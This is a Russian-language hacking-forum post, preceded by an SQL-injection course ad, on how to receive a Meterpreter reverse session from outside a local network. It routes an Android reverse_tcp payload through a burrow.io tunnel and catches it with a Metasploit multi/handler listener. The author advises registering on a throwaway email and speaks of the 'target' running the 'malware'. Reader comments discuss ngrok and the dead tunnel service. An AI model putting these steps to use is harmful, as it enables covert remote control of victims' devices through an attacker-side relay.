• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Получение Meterpreter за локальной сетью.

Доброго времени суток мои юные хацкеры, и не только. Сегодня я вам поведаю об одном из множества способов, получения сессии meterpreter за локальной сетью т.е мы сможем получить её не только в локальной сети. Приступим.
Переходим на сайт , и проходим регистрацию. В этом сервисе есть большой минус. Нам даётя 7 дней триала. Но не проблема создать новый аккаунт. Для своей же безопасности регистрируем наш аккаунт на левую почту.
Хотя мы ничего нарушать не будем, так ведь? :)
После регистрации, нам предоставляют возможность выбора 2-ух опций, выбираем "Forward a TCP port to your localhost".
Выделение_001.png

Видим меню выбора "Localhost port", выбираем Custom "TCP port". Теперь нам нужно создать "Security Group", и нажимаем "Click here to create one".
Выделение_002.png

Добавляем группу, путём нажатия на кнопку "+add", и подтверждаем "Create security group", в поле "ext: 22, указываем порт на свой выбор, завершаем нашу настройку нажатием "Create tunel".
Выделение_003.png

Нас перенаправляет на страницу нашего тунеля, тут мы можем видеть все команды для запуска нашего тунеля.
Выделение_007.png

Теперь нам предстоит запустить сам тунель. Копируем Curl ссылку, и запускаем её в терминале. Наш тунель запущен. Осталась последняя часть.
Выделение_008.png

Создание вредной нагрузки.
Нам дается ссылка вида: io.burrow.io:4445 У каждого может быть разный порт. Вместо нашего локального ip, в полезной нагрузке, мы будем указывать lhost=io.burrow.io, соответствено lport=7890. Создали.
Переходим к созданию листенера. Запускаем msfconsole. Выполняем команду "use multi/handler", и указываем вид нашей нагрузки, в моём случае это android/meterpreter/reverse_tcp.
Самое главное. Чтобы нам прилетела сессия, указываем set lhost=127.0.0.1, и порт, я указал 7890. Exploit.
Выделение_009.png

Когда наша цель запустит вредонос, нам прилетит сессия. Тоже самое вы можете повторить и в Termux. Спасибо за внимание.
 

Вложения

  • Выделение_009.png
    Выделение_009.png
    39,9 КБ · Просмотры: 731

ruda_dima

Green Team
16.05.2018
16
29
BIT
0
ngrock может и выдает рандомный порт, но он очень прост в использовании. Часто им пользуюсь.
 
H

HighGnome

что для вас значит за пределами локальной сети? можно ли так прокинуть сессию на удалённую нашину или что именно.
Вот, именно тот вопрос, который меня интересует , возможно вы знаете решение?
 

MLNK

Mod. Ethical Hacking
Red Team
23.01.2018
560
706
BIT
1
так там же ответ уже есть
 
A

Anderson

При регистрации на burrow.io перекидывает на ролик Рика Эстли))))
Я тут просто ах**ваю с такого стеба)))
 
  • Нравится
Реакции: RoyanZ и Saint4626
D

DarkAres

А как через ngrok сделать, а то burrow.io сдох подкинте статью.
 
  • Нравится
Реакции: Sazoks

DataReset

New member
31.03.2022
1
0
BIT
0
burrow.io выкидывает на рикролл, localhost предложенный выше выдаёт ошибку
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!